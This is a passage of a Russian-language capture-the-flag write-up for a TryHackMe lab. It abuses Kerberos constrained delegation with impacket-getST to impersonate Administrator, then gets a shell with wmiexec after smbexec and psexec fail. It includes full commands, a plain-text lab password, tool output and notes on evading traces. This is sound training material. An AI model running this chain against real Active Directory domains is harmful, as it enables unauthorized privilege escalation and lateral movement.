\u0418\u043c\u0435\u043d\u043d\u043e \u0432 Constrained Delegation \u0441\u0435\u0440\u0432\u0438\u0441 \u043c\u043e\u0436\u0435\u0442 \u0434\u0435\u043b\u0435\u0433\u0438\u0440\u043e\u0432\u0430\u0442\u044c TGS \u0442\u043e\u043b\u044c\u043a\u043e \u043a \u043e\u043f\u0440\u0435\u0434\u0435\u043b\u0451\u043d\u043d\u044b\u043c \u0441\u0435\u0440\u0432\u0438\u0441\u0430\u043c.<\/p>\n
\u041d\u0430 \u0447\u0442\u043e \u0435\u0449\u0435 \u043d\u0443\u0436\u043d\u043e \u043e\u0431\u0440\u0430\u0442\u0438\u0442\u044c \u0432\u043d\u0438\u043c\u0430\u043d\u0438\u0435. Trusted For Constrained Delegation: TRUE \u0438 AllowedToDelegate: cifs\/HayStack.thm.corp. \u042d\u0442\u043e \u043e\u0437\u043d\u0430\u0447\u0430\u0435\u0442, \u0447\u0442\u043e \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044c DARLA_WINTERS \u043c\u043e\u0436\u0435\u0442 \u043f\u043e\u043b\u0443\u0447\u0430\u0442\u044c Kerberos service tickets \u043a CIFS \u043d\u0430 HAYSTACK \u043e\u0442 \u0438\u043c\u0435\u043d\u0438 \u043b\u044e\u0431\u043e\u0433\u043e \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f \u0434\u043e\u043c\u0435\u043d\u0430.<\/p>\n
\u0410 CIFS = SMB.<\/p>\n
\u041f\u043e\u044d\u0442\u043e\u043c\u0443 \u043e\u0441\u0442\u0430\u0435\u0442\u0441\u044f \u0442\u043e\u043b\u044c\u043a\u043e \u043f\u0440\u043e\u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0438\u0440\u043e\u0432\u0430\u0442\u044c \u044d\u0442\u043e\u0442 \u043c\u0438\u0441\u043a\u043e\u043d\u0444\u0438\u0433 \u0438 \u043f\u043e\u043b\u0443\u0447\u0438\u0442\u044c \u0431\u0438\u043b\u0435\u0442 \u0430\u0434\u043c\u0438\u043d\u0430.<\/p>\n
impacket-getST -spn 'cifs\/haystack.thm.corp' -impersonate Administrator -dc-ip 'thm.corp' 'thm.corp\/DARLA_WINTERS:newP@ssword2022'Impacket v0.14.0.dev0 - Copyright Fortra, LLC and its affiliated companies [-] CCache file is not found. Skipping...[*] Getting TGT for user[*] Impersonating Administrator[*] Requesting S4U2self[*] Requesting S4U2Proxy[*] Saving ticket in Administrator@cifs_haystack.thm.corp@THM.CORP.ccache<\/code>
<\/a><\/div><\/pre>\n
\u0417\u0434\u0435\u0441\u044c \u043e\u0447\u0435\u043d\u044c \u043b\u0435\u0433\u043a\u043e \u043e\u0448\u0438\u0431\u0438\u0442\u044c\u0441\u044f \u0438 \u043f\u0440\u043e\u043f\u0438\u0441\u0430\u0442\u044c \u043d\u0435\u0432\u0435\u0440\u043d\u044b\u0439 spn. \u041e\u0447\u0435\u043d\u044c \u0445\u043e\u0440\u043e\u0448\u0430\u044f \u0441\u0442\u0430\u0442\u044c\u044f \u043d\u0430 \u044d\u0442\u0443 \u0442\u0435\u043c\u0443 https:\/\/blog.deephacking.tech\/en\/posts\/constrained-delegation-y-resource-based-constrained-delegation\/<\/a><\/p>\n
\u0415\u0441\u043b\u0438 \u0443\u043a\u0430\u0437\u0430\u0442\u044c spn \u0431\u0435\u0437 \u043f\u043e\u043b\u043d\u043e\u0433\u043e \u0434\u043e\u043c\u0435\u043d\u043d\u043e\u0433\u043e \u0438\u043c\u0435\u043d\u0438, \u0442\u043e \u0431\u0438\u043b\u0435\u0442 \u0432\u0441\u0435 \u0440\u0430\u0432\u043d\u043e \u0432\u044b\u043f\u0438\u0448\u0435\u0442\u0441\u044f, \u043e\u0434\u043d\u0430\u043a\u043e \u0437\u0430\u043b\u043e\u0433\u0438\u043d\u0438\u0442\u0441\u044f \u0443 \u043c\u0435\u043d\u044f \u043d\u0435 \u0432\u044b\u0448\u043b\u043e.<\/p>\n
\u0414\u0430\u043b\u0435\u0435 \u0438\u043c\u043f\u043e\u0440\u0442\u0438\u0440\u0443\u0435\u043c \u043f\u043e\u043b\u0443\u0447\u0435\u043d\u043d\u044b\u0439 \u0431\u0438\u043b\u0435\u0442 \u0432 \u0441\u0435\u0441\u0441\u0438\u044e \u0447\u0435\u0440\u0435\u0437 \u043f\u0435\u0440\u0435\u043c\u0435\u043d\u043d\u0443\u044e KRB5CCNAME.<\/p>\n
export KRB5CCNAME=\/tmp\/Administrator@cifs_HAYSTACK@THM.CORP.ccache<\/code>
<\/a><\/div><\/pre>\n
\u041b\u043e\u0433\u0438\u043d\u0438\u043c\u0441\u044f \u0432 \u0441\u0438\u0441\u0442\u0435\u043c\u0443 \u0438 \u0447\u0438\u0442\u0430\u0435\u043c \u0444\u043b\u0430\u0433\u0438<\/h3>\n
\u041e\u0441\u0442\u0430\u043b\u043e\u0441\u044c \u0442\u043e\u043b\u044c\u043a\u043e \u0437\u0430\u043b\u043e\u0433\u0438\u043d\u0438\u0442\u044c\u0441\u044f.<\/p>\n
impacket-smbexec -k -no-pass -dc-ip 'thm.corp' 'THM.CORP\/Administrator@haystack.thm.corp'Impacket v0.14.0.dev0 - Copyright Fortra, LLC and its affiliated companies [-] SMB SessionError: code: 0xc0000034 - STATUS_OBJECT_NAME_NOT_FOUND - The object name is not found.<\/code>
<\/a><\/div><\/pre>\n
\u041f\u043e\u043f\u0440\u043e\u0431\u043e\u0432\u0430\u043b \u0447\u0435\u0440\u0435\u0437 psexec\u2026<\/p>\n
impacket-psexec -k -no-pass -dc-ip 'thm.corp' 'THM.CORP\/Administrator@haystack.thm.corp' Impacket v0.14.0.dev0 - Copyright Fortra, LLC and its affiliated companies [*] Requesting shares on haystack.thm.corp.....[*] Found writable share ADMIN$[*] Uploading file rUxIcyGE.exe[*] Opening SVCManager on haystack.thm.corp.....[*] Creating service JSZX on haystack.thm.corp.....[*] Starting service JSZX.....[*] Opening SVCManager on haystack.thm.corp.....[-] Error performing the uninstallation, cleaning up<\/code>
<\/a><\/div><\/pre>\n
\u0422\u043e\u0436\u0435 \u0431\u043e\u0440\u043e\u0434\u0430.<\/p>\n
\u041f\u043e\u0447\u0435\u043c\u0443 wmiexec \u0440\u0430\u0431\u043e\u0442\u0430\u0435\u0442 \u0442\u0430\u043c, \u0433\u0434\u0435 \u0434\u0440\u0443\u0433\u0438\u0435 \u0442\u0435\u0440\u043f\u044f\u0442 \u043d\u0435\u0443\u0434\u0430\u0447\u0443: smbexec \u0438 psexec \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u044e\u0442 \u0441\u043e\u0437\u0434\u0430\u043d\u0438\u0435 \u0441\u043b\u0443\u0436\u0431 Windows \u0447\u0435\u0440\u0435\u0437 \u0434\u0438\u0441\u043f\u0435\u0442\u0447\u0435\u0440 \u0441\u043b\u0443\u0436\u0431, \u0447\u0442\u043e \u0442\u0440\u0435\u0431\u0443\u0435\u0442 \u0437\u0430\u043f\u0438\u0441\u0438 \u0438\u0441\u043f\u043e\u043b\u043d\u044f\u0435\u043c\u044b\u0445 \u0444\u0430\u0439\u043b\u043e\u0432 \u043d\u0430 \u0434\u0438\u0441\u043a \u0438 \u0443\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u044f \u0436\u0438\u0437\u043d\u0435\u043d\u043d\u044b\u043c \u0446\u0438\u043a\u043b\u043e\u043c \u0441\u043b\u0443\u0436\u0431. wmiexec \u0440\u0430\u0431\u043e\u0442\u0430\u0435\u0442 \u0447\u0435\u0440\u0435\u0437 WMI (Windows Management Instrumentation), \u0432\u044b\u043f\u043e\u043b\u043d\u044f\u044f \u043a\u043e\u043c\u0430\u043d\u0434\u044b \u0441 \u043f\u043e\u043c\u043e\u0449\u044c\u044e Win32_Process.Create() \u0431\u0435\u0437 \u0438\u0437\u043c\u0435\u043d\u0435\u043d\u0438\u044f \u0444\u0430\u0439\u043b\u043e\u0432\u043e\u0439 \u0441\u0438\u0441\u0442\u0435\u043c\u044b \u0438\u043b\u0438 \u0438\u043d\u0444\u0440\u0430\u0441\u0442\u0440\u0443\u043a\u0442\u0443\u0440\u044b \u0441\u043b\u0443\u0436\u0431. \u041e\u043d \u0440\u0430\u0431\u043e\u0442\u0430\u0435\u0442 \u0442\u0438\u0448\u0435, \u043e\u0441\u0442\u0430\u0432\u043b\u044f\u0435\u0442 \u043c\u0435\u043d\u044c\u0448\u0435 \u0441\u043b\u0435\u0434\u043e\u0432 \u0434\u043b\u044f \u0430\u043d\u0430\u043b\u0438\u0437\u0430 \u0438 \u043e\u0431\u0445\u043e\u0434\u0438\u0442 \u043f\u0440\u043e\u0431\u043b\u0435\u043c\u044b \u0441 \u043f\u0440\u0430\u0432\u0430\u043c\u0438 \u0434\u043e\u0441\u0442\u0443\u043f\u0430 \u043d\u0430 \u0443\u0440\u043e\u0432\u043d\u0435 \u0444\u0430\u0439\u043b\u043e\u0432, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u043c\u0435\u0448\u0430\u043b\u0438 \u0434\u0440\u0443\u0433\u0438\u043c \u0438\u043d\u0441\u0442\u0440\u0443\u043c\u0435\u043d\u0442\u0430\u043c.<\/p>\n
impacket-wmiexec -k -no-pass -dc-ip 'thm.corp' 'THM.CORP\/Administrator@haystack.thm.corp' Impacket v0.14.0.dev0 - Copyright Fortra, LLC and its affiliated companies [*] SMBv3.0 dialect used[!] Launching semi-interactive shell - Careful what you execute[!] Press help for extra shell commandsC:\\>whoamithm\\administrator<\/code>
<\/a><\/div><\/pre>\n
\u0418 \u0432\u043e\u0442 \u043e\u043d \u0441\u0440\u0430\u0431\u043e\u0442\u0430\u043b \u0438\u0434\u0435\u043b\u044c\u043d\u043e.<\/p>\n
\u041e\u0441\u0442\u0430\u043b\u043e\u0441\u044c \u043f\u0440\u043e\u0447\u0438\u0442\u0430\u0442\u044c \u0444\u043b\u0430\u0433.<\/p>\n
C:\\Users\\Administrator\\Desktop>type root.txtTHM{SOME_FLAG_ROOT_IS_HERE}<\/code>
<\/a><\/div><\/pre>\n
\u0414\u0430, \u044f \u0437\u0430\u0431\u044b\u043b, \u0447\u0442\u043e \u0435\u0441\u0442\u044c \u0435\u0449\u0435 \u044e\u0437\u0435\u0440 \u0444\u043b\u0430\u0433. \u041e\u043d \u0431\u044b\u043b \u0432 \u043f\u0430\u043f\u043a\u0435 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f automate.<\/p>\n
C:\\Users\\automate\\Desktop>type user.txtTHM{USER_FLAG_IS_HERE}<\/code>
<\/a><\/div><\/pre>\n
\u0412\u0438\u0434\u0438\u043c\u043e, \u044f \u043d\u0435 \u043f\u043e\u043d\u044f\u043b \u0437\u0430\u0434\u0443\u043c\u043a\u0443 \u0430\u0432\u0442\u043e\u0440\u0430 \u0438 \u043f\u043e\u0448\u0435\u043b \u043d\u0435 \u0442\u0435\u043c \u043f\u0443\u0442\u0435\u043c, \u043e\u0434\u043d\u0430\u043a\u043e \u044f \u0440\u0435\u0448\u0438\u043b \u0442\u0430\u043a\u0438\u043c \u043e\u0431\u0440\u0430\u0437\u043e\u043c.<\/p>\n\n
\u0418\u0437\u0432\u043b\u0435\u0447\u0451\u043d\u043d\u044b\u0435 \u0443\u0440\u043e\u043a\u0438<\/h3>\n